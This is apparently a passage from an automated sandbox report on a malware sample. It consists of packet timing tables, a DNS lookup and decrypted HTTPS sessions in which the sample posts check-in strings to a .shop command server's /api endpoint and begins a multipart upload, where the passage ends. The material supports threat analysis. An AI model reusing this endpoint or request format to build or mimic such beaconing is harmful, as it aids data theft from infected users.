                Jul 2, 2024 08:32:59.061744928 CEST | 443 | 49712 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:59.063007116 CEST | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:59.063111067 CEST | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:59.063159943 CEST | 443 | 49712 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:59.468933105 CEST | 443 | 49712 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:59.469038010 CEST | 443 | 49712 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:59.469127893 CEST | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:59.481806993 CEST | 49712 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:59.481834888 CEST | 443 | 49712 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:59.581898928 CEST | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:59.581950903 CEST | 443 | 49714 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:32:59.582032919 CEST | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:59.582391977 CEST | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:32:59.582406044 CEST | 443 | 49714 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:00.076350927 CEST | 443 | 49714 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:00.076463938 CEST | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:00.077837944 CEST | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:00.077856064 CEST | 443 | 49714 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:00.078145981 CEST | 443 | 49714 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:00.079432011 CEST | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:00.079566956 CEST | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:00.079576969 CEST | 443 | 49714 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:00.451354027 CEST | 443 | 49714 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:00.451452017 CEST | 443 | 49714 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:00.451508999 CEST | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:00.451680899 CEST | 49714 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:00.451704025 CEST | 443 | 49714 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.123756886 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.123825073 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.123900890 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.124382973 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.124397993 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.590842962 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.591789007 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.592406034 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.592426062 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.592677116 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.594969034 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.594969034 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.595012903 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.595408916 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.595484972 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.595635891 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.595674992 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.595794916 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.595820904 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.596003056 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.596040964 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.596199036 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.596218109 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.596230984 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.596241951 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.596369982 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.596395969 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.596419096 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.596770048 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.596807003 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.605206966 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.605448008 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.605472088 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:01.605494022 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.605518103 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.605587959 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:01.610184908 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:03.898973942 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:03.899059057 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:03.899106979 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:03.899801016 CEST | 49719 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:03.899821043 CEST | 443 | 49719 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:03.977654934 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:03.977701902 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:03.977834940 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:03.978478909 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:03.978496075 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:04.445877075 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:04.446024895 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:04.447602034 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:04.447634935 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:04.447909117 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:04.458805084 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:04.458880901 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:04.458924055 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:04.834367037 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:04.834479094 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:04.834557056 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:04.834808111 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:04.834840059 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Jul 2, 2024 08:33:04.834850073 CEST | 49724 | 443 | 192.168.2.5 | 172.67.141.234
                Jul 2, 2024 08:33:04.834856033 CEST | 443 | 49724 | 172.67.141.234 | 192.168.2.5
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Jul 2, 2024 08:32:51.867331982 CEST | 62670 | 53 | 192.168.2.5 | 1.1.1.1
                Jul 2, 2024 08:32:51.881201982 CEST | 53 | 62670 | 1.1.1.1 | 192.168.2.5
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Jul 2, 2024 08:32:51.867331982 CEST | 192.168.2.5 | 1.1.1.1 | 0xd818 | Standard query (0) | contintnetksows.shop | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Jul 2, 2024 08:32:51.881201982 CEST | 1.1.1.1 | 192.168.2.5 | 0xd818 | No error (0) | contintnetksows.shop |  | 172.67.141.234 | A (IP address) | IN (0x0001) | false
                Jul 2, 2024 08:32:51.881201982 CEST | 1.1.1.1 | 192.168.2.5 | 0xd818 | No error (0) | contintnetksows.shop |  | 104.21.79.40 | A (IP address) | IN (0x0001) | false
                • contintnetksows.shop
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.5 | 49707 | 172.67.141.234 | 443 | 3276 | C:\Users\user\Desktop\6RVmzn1DzL.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-07-02 06:32:52 UTC | 267 | OUT | POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: contintnetksows.shop
                2024-07-02 06:32:52 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                Data Ascii: act=life
                2024-07-02 06:32:52 UTC | 818 | IN | HTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:52 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=i90u6uqmntbmbijvrr947uilde; expires=Sat, 26-Oct-2024 00:19:31 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i2MGSxML4jrrNnA%2FvbT251GmtAm8i%2BPGEe7spD%2BmxCN3cAf1%2FvI%2Btsw0%2FvrZMhNWUF2BIXgGdG6WdBK9kAhhFE4uDApvbn%2BwT%2FEMWc7zBYh4QkBXipzH6Ym1nLqf4NzRPR4ABZKWWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc99e01cc18cba-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:52 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                Data Ascii: 2ok
                2024-07-02 06:32:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.5 | 49708 | 172.67.141.234 | 443 | 3276 | C:\Users\user\Desktop\6RVmzn1DzL.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-07-02 06:32:53 UTC | 268 | OUT | POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 42
                Host: contintnetksows.shop
                2024-07-02 06:32:53 UTC | 42 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 53 31 5a 72 6c 48 2d 2d 26 6a 3d
                Data Ascii: act=recive_message&ver=4.0&lid=S1ZrlH--&j=
                2024-07-02 06:32:53 UTC | 814 | IN | HTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:32:53 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=io86bsllqtfirfknjnbh32g4vk; expires=Sat, 26-Oct-2024 00:19:32 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2YG%2F42dFWdbEQ4JCY%2FxMqF%2Bss9uoJGgKmMIFipcw9TViMHe%2FyafHl3Z9CV60u5SYqQ87JNThtlQg8zVSkc2z2qwXDcCrwUIke8FaiJMiHYUKFpN5XRp%2Ba0q28%2BFjxlnUUbnmWLzKA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc99e58cbe1977-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:32:53 UTC | 555 | IN | Data Raw: 63 66 34 0d 0a 68 36 5a 38 2f 6b 51 33 41 49 7a 50 4a 42 57 70 77 41 30 44 55 63 32 69 5a 79 6c 46 68 4d 47 65 66 72 31 66 6c 62 36 43 48 6b 54 38 72 48 58 63 4d 68 55 36 72 50 73 49 48 36 44 69 66 6d 5a 7a 39 34 49 54 57 7a 44 68 37 5a 52 33 6e 7a 37 78 6e 4c 67 2b 49 75 62 4b 44 35 74 6f 50 51 6d 75 71 6c 77 33 6b 2b 42 57 43 56 6a 45 32 55 63 4c 49 4f 72 6a 70 46 36 66 4f 76 2f 63 34 33 49 6d 35 73 30 54 6a 69 68 55 61 4f 43 6f 54 48 44 4b 70 47 78 76 50 4b 6a 48 41 6b 67 76 36 71 6a 7a 46 74 42 39 75 5a 36 67 65 7a 36 6c 6e 46 7a 63 43 56 4a 30 37 59 4a 46 5a 73 4c 69 4c 58 35 39 78 36 74 75 55 6d 57 6d 70 50 42 63 68 33 2b 33 33 2b 64 38 4b 4f 48 43 46 35 59 73 58 32 54 76 71 30 35 6c 77 4b 5a 6c 61 7a 4f 70 79 77 68 44 4e 65 69 6e 39 42 44 65 4d 50
                Data Ascii: cf4h6Z8/kQ3AIzPJBWpwA0DUc2iZylFhMGefr1flb6CHkT8rHXcMhU6rPsIH6DifmZz94ITWzDh7ZR3nz7xnLg+IubKD5toPQmuqlw3k+BWCVjE2UcLIOrjpF6fOv/c43Im5s0TjihUaOCoTHDKpGxvPKjHAkgv6qjzFtB9uZ6gez6lnFzcCVJ07YJFZsLiLX59x6tuUmWmpPBch3+33+d8KOHCF5YsX2Tvq05lwKZlazOpywhDNein9BDeMP
                2024-07-02 06:32:53 UTC | 1369 | IN | Data Raw: 7a 6e 63 47 61 39 68 6c 36 59 4a 31 46 6a 36 71 4e 49 63 38 65 6b 59 57 77 38 71 63 6f 46 54 43 33 75 71 2f 30 52 31 44 4c 33 32 65 31 34 49 4f 6e 46 47 39 78 6f 46 79 4c 70 74 51 59 76 69 65 4a 42 5a 6a 43 39 67 6a 42 49 4b 65 69 6b 36 6c 79 64 49 72 6d 30 69 78 63 2f 70 34 51 5a 6b 47 59 4e 49 4b 36 6a 51 33 6a 5a 6f 33 31 6b 50 62 33 4d 41 45 30 71 35 61 33 38 47 64 67 77 2b 64 72 6e 66 79 37 68 78 52 43 51 4c 46 5a 6d 37 65 30 49 4e 59 75 6c 64 79 46 72 37 59 41 30 53 43 50 68 73 66 38 53 6e 33 2f 6f 6b 6f 67 58 54 66 79 47 58 70 73 71 46 54 71 73 37 55 78 78 78 71 74 6b 5a 6a 75 6a 30 67 35 45 4a 4f 2b 6b 2b 68 62 63 4e 66 33 61 37 6e 30 68 34 4d 4d 4d 6b 69 31 59 59 65 53 72 42 6a 6d 4a 34 6d 68 35 63 2f 65 43 52 57 55 6b 39 37 58 4f 48 38 34 73 74
                Data Ascii: zncGa9hl6YJ1Fj6qNIc8ekYWw8qcoFTC3uq/0R1DL32e14IOnFG9xoFyLptQYvieJBZjC9gjBIKeik6lydIrm0ixc/p4QZkGYNIK6jQ3jZo31kPb3MAE0q5a38Gdgw+drnfy7hxRCQLFZm7e0INYuldyFr7YA0SCPhsf8Sn3/okogXTfyGXpsqFTqs7UxxxqtkZjuj0g5EJO+k+hbcNf3a7n0h4MMMki1YYeSrBjmJ4mh5c/eCRWUk97XOH84st
                2024-07-02 06:32:53 UTC | 1369 | IN | Data Raw: 72 36 6f 59 72 6e 79 68 62 5a 66 6a 74 42 47 69 46 79 67 51 4b 4b 75 32 41 41 6b 64 6e 76 75 47 38 45 4e 59 39 2f 4e 62 6b 66 43 48 6f 77 52 32 62 4a 56 68 6c 35 4b 4e 42 63 38 65 72 59 6d 63 7a 71 4d 51 41 57 53 4c 76 72 2f 42 63 6b 58 2b 33 32 2f 67 38 66 71 65 45 4d 5a 73 77 56 6b 33 74 76 45 38 33 69 62 30 68 43 56 6a 45 32 55 63 4c 49 4f 72 6a 70 46 36 66 4f 76 4c 55 36 33 6f 75 35 64 59 62 6b 69 31 55 61 4f 69 73 53 33 76 4e 6f 6d 35 68 4e 61 50 41 41 6b 77 31 39 4b 62 36 44 74 56 39 75 5a 36 67 65 7a 36 6c 6e 46 7a 63 45 45 56 31 2f 37 73 45 51 73 69 73 59 57 59 6c 37 34 49 61 42 55 2b 4e 79 4f 56 65 6e 7a 72 37 6e 4c 67 2b 5a 75 37 45 45 70 73 75 55 32 62 6d 6f 6b 6c 2b 32 61 4e 6a 62 79 47 6f 77 41 78 46 4b 4f 71 71 38 52 76 53 4e 76 33 52 35 48
                Data Ascii: r6oYrnyhbZfjtBGiFygQKKu2AAkdnvuG8ENY9/NbkfCHowR2bJVhl5KNBc8erYmczqMQAWSLvr/BckX+32/g8fqeEMZswVk3tvE83ib0hCVjE2UcLIOrjpF6fOvLU63ou5dYbki1UaOisS3vNom5hNaPAAkw19Kb6DtV9uZ6gez6lnFzcEEV1/7sEQsisYWYl74IaBU+NyOVenzr7nLg+Zu7EEpsuU2bmokl+2aNjbyGowAxFKOqq8RvSNv3R5H
                2024-07-02 06:32:53 UTC | 30 | IN | Data Raw: 44 4a 49 6f 58 47 2f 6f 70 55 46 35 78 71 6c 70 61 6a 53 6f 78 67 68 44 4b 75 4f 67 0d 0a
                Data Ascii: DJIoXG/opUF5xqlpajSoxghDKuOg
                2024-07-02 06:32:53 UTC | 1369 | IN | Data Raw: 34 33 65 63 0d 0a 2f 52 6a 56 4c 2f 54 58 36 6e 45 73 70 59 70 63 33 43 46 4e 49 72 62 76 42 6c 44 48 69 33 39 36 49 62 6d 41 52 31 52 70 6a 73 69 58 42 5a 31 39 38 4e 43 67 4a 47 53 6c 78 78 47 56 4b 56 31 71 34 61 4a 43 65 63 32 6b 59 6d 51 38 70 64 49 4e 52 53 72 74 72 50 63 4f 33 7a 44 7a 30 4f 52 30 4c 65 2b 45 55 4e 35 6d 55 6e 71 75 39 51 51 33 2f 71 39 67 59 54 43 35 67 45 64 55 61 59 37 49 6c 77 57 64 66 66 44 51 6f 43 52 6b 70 63 67 51 6e 43 6c 5a 62 75 57 6c 52 33 76 46 70 57 70 6f 4f 36 66 53 42 45 38 76 35 36 33 7a 48 64 73 34 38 74 6a 6e 65 43 44 71 68 46 44 65 5a 6c 4a 36 72 76 55 45 4e 2b 53 46 57 69 4d 53 6c 59 42 48 56 47 6d 4f 79 4a 63 46 6e 58 33 77 30 4b 41 6b 5a 4b 58 49 48 5a 41 75 57 6d 54 6e 6f 55 78 2b 77 4b 35 6b 5a 54 2b 6d 78
                Data Ascii: 43ec/RjVL/TX6nEspYpc3CFNIrbvBlDHi396IbmAR1RpjsiXBZ198NCgJGSlxxGVKV1q4aJCec2kYmQ8pdINRSrtrPcO3zDz0OR0Le+EUN5mUnqu9QQ3/q9gYTC5gEdUaY7IlwWdffDQoCRkpcgQnClZbuWlR3vFpWpoO6fSBE8v563zHds48tjneCDqhFDeZlJ6rvUEN+SFWiMSlYBHVGmOyJcFnX3w0KAkZKXIHZAuWmTnoUx+wK5kZT+mx
                2024-07-02 06:32:53 UTC | 1369 | IN | Data Raw: 73 70 50 51 57 30 54 44 78 32 4f 5a 36 5a 71 75 47 58 70 73 2b 46 54 71 73 37 58 52 36 78 61 74 73 5a 7a 36 35 36 44 51 4c 5a 66 6e 74 6c 48 65 30 4a 4c 57 63 35 33 42 6d 76 59 5a 65 6d 43 31 64 62 75 75 6c 51 33 62 44 71 47 64 75 50 4c 33 42 43 6b 49 67 37 61 37 7a 45 74 6f 7a 35 64 76 72 64 79 37 73 79 68 6a 63 61 42 63 69 36 62 55 47 4c 34 6e 69 57 57 49 39 70 4e 45 4b 53 43 75 6d 34 65 4e 53 74 31 61 63 78 61 49 38 49 65 6d 45 52 74 35 6d 58 32 6e 71 72 6b 4a 79 78 4b 4e 75 5a 79 47 6f 79 52 64 46 4b 75 6d 72 39 42 58 65 4f 66 4c 52 35 6e 41 73 35 4d 4d 51 6b 69 34 56 4c 4b 7a 74 51 57 2b 4c 2b 69 30 68 45 72 2f 62 46 31 30 71 78 36 37 7a 58 4a 30 69 75 62 53 4c 46 7a 2b 6e 68 42 6d 51 5a 67 30 67 72 71 52 55 63 38 61 77 5a 6d 59 39 6f 4d 4d 58 53 69
                Data Ascii: spPQW0TDx2OZ6ZquGXps+FTqs7XR6xatsZz656DQLZfntlHe0JLWc53BmvYZemC1dbuulQ3bDqGduPL3BCkIg7a7zEtoz5dvrdy7syhjcaBci6bUGL4niWWI9pNEKSCum4eNSt1acxaI8IemERt5mX2nqrkJyxKNuZyGoyRdFKumr9BXeOfLR5nAs5MMQki4VLKztQW+L+i0hEr/bF10qx67zXJ0iubSLFz+nhBmQZg0grqRUc8awZmY9oMMXSi
                2024-07-02 06:32:53 UTC | 1369 | IN | Data Raw: 46 39 59 79 39 74 50 67 66 79 66 76 7a 41 79 61 4a 6c 35 71 36 61 56 43 65 64 6d 6a 59 43 46 39 37 59 41 43 55 32 65 2b 34 62 77 74 79 54 72 77 30 36 4a 56 49 66 37 46 46 4a 38 74 57 53 4b 73 73 67 67 66 6f 4d 6c 32 49 33 4f 6f 7a 45 55 54 5a 61 61 75 38 42 48 62 4c 2f 76 63 34 48 55 68 37 39 59 52 6b 79 74 57 59 75 75 2f 52 32 58 45 71 57 70 69 4e 36 44 50 43 55 4d 74 70 75 32 2b 58 4e 67 6c 74 34 53 69 50 41 72 6d 31 52 54 65 41 55 39 30 36 61 46 58 66 4d 61 75 4c 79 4d 73 34 61 68 75 49 44 36 6b 34 2f 73 51 6e 32 57 31 6e 4f 42 39 4b 2f 66 42 48 35 59 73 57 47 72 68 71 45 4e 34 7a 36 5a 6b 62 79 47 68 7a 77 56 4e 4c 4f 65 6d 2f 78 66 56 4d 2f 37 4f 6f 44 4a 6b 70 63 4d 47 33 48 34 58 49 73 53 32 52 33 72 48 34 45 46 71 4a 61 69 43 4a 45 55 73 34 61 2f
                Data Ascii: F9Yy9tPgfyfvzAyaJl5q6aVCedmjYCF97YACU2e+4bwtyTrw06JVIf7FFJ8tWSKssggfoMl2I3OozEUTZaau8BHbL/vc4HUh79YRkytWYuu/R2XEqWpiN6DPCUMtpu2+XNglt4SiPArm1RTeAU906aFXfMauLyMs4ahuID6k4/sQn2W1nOB9K/fBH5YsWGrhqEN4z6ZkbyGhzwVNLOem/xfVM/7OoDJkpcMG3H4XIsS2R3rH4EFqJaiCJEUs4a/
                2024-07-02 06:32:53 UTC | 1369 | IN | Data Raw: 62 65 53 6f 6a 77 68 2f 59 52 47 33 6d 5a 77 51 66 6d 37 54 44 58 6f 74 58 6c 72 4e 4b 50 57 44 6b 6f 6b 38 4b 37 73 58 4a 30 69 75 62 53 4c 46 7a 2b 6e 68 42 6d 51 5a 67 30 67 72 71 5a 4a 65 63 61 70 61 32 67 32 70 38 4d 41 54 69 33 71 72 2f 30 55 31 6a 66 79 32 65 5a 32 4a 65 76 4c 48 35 41 69 58 47 7a 6e 37 51 67 31 69 36 56 33 49 57 76 74 67 44 4e 62 49 50 36 75 37 46 37 74 50 75 62 4e 39 58 45 32 34 34 59 78 6e 79 70 57 5a 2b 6d 39 42 6a 58 55 37 41 63 4b 57 4c 61 43 52 55 77 72 70 76 75 2b 58 4e 38 35 2b 39 2f 6e 63 69 6e 6f 79 78 6d 58 4b 56 39 73 2f 4b 4a 44 66 38 65 71 59 6e 4d 35 70 64 49 4d 51 69 72 6f 71 2b 34 66 6e 33 4f 31 6e 4f 64 6b 5a 72 32 47 58 71 34 73 56 6d 37 34 6f 45 6b 33 69 62 30 68 43 56 6a 45 32 55 63 4c 49 4f 72 6a 70 46 36 66
                Data Ascii: beSojwh/YRG3mZwQfm7TDXotXlrNKPWDkok8K7sXJ0iubSLFz+nhBmQZg0grqZJecapa2g2p8MATi3qr/0U1jfy2eZ2JevLH5AiXGzn7Qg1i6V3IWvtgDNbIP6u7F7tPubN9XE244YxnypWZ+m9BjXU7AcKWLaCRUwrpvu+XN85+9/ncinoyxmXKV9s/KJDf8eqYnM5pdIMQiroq+4fn3O1nOdkZr2GXq4sVm74oEk3ib0hCVjE2UcLIOrjpF6f
                2024-07-02 06:32:53 UTC | 1369 | IN | Data Raw: 73 58 54 61 58 43 58 73 52 6b 42 53 79 47 78 69 30 63 69 36 5a 2b 49 57 76 74 6b 46 63 51 63 72 58 30 72 45 36 33 56 70 7a 44 72 68 52 4e 6a 74 31 32 39 30 30 2b 49 76 6a 74 48 6a 57 5a 37 41 63 4b 57 4d 53 41 46 77 74 2f 70 4f 4f 37 48 38 30 76 38 64 2f 32 66 32 48 62 2b 6a 32 4c 4d 46 39 35 72 49 74 42 5a 73 4b 30 59 6e 4d 4e 6b 65 34 49 53 69 54 6f 34 63 30 4b 30 69 33 30 32 65 64 43 47 4f 76 44 43 70 73 6f 55 32 4b 75 34 79 34 63 6f 4d 6b 76 62 6e 50 33 67 6a 77 4c 62 36 61 63 73 6e 53 30 56 70 79 63 2b 44 78 2b 70 34 51 72 6e 79 68 62 5a 66 69 38 43 31 54 63 74 47 56 36 63 59 6e 48 46 45 49 78 36 37 47 38 55 72 64 57 6e 4c 65 67 65 6d 61 39 68 6b 37 53 54 6a 34 4a 68 65 31 43 5a 6f 76 36 4c 54 46 68 39 4a 56 57 48 48 65 30 79 35 64 33 77 48 4f 66 74
                Data Ascii: sXTaXCXsRkBSyGxi0ci6Z+IWvtkFcQcrX0rE63VpzDrhRNjt12900+IvjtHjWZ7AcKWMSAFwt/pOO7H80v8d/2f2Hb+j2LMF95rItBZsK0YnMNke4ISiTo4c0K0i302edCGOvDCpsoU2Ku4y4coMkvbnP3gjwLb6acsnS0Vpyc+Dx+p4QrnyhbZfi8C1TctGV6cYnHFEIx67G8UrdWnLegema9hk7STj4Jhe1CZov6LTFh9JVWHHe0y5d3wHOft


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.5 | 49709 | 172.67.141.234 | 443 | 3276 | C:\Users\user\Desktop\6RVmzn1DzL.exe
                Timestamp | Bytes transferred | Direction | Data
                2024-07-02 06:32:55 UTC | 286 | OUT | POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 12830
                Host: contintnetksows.shop
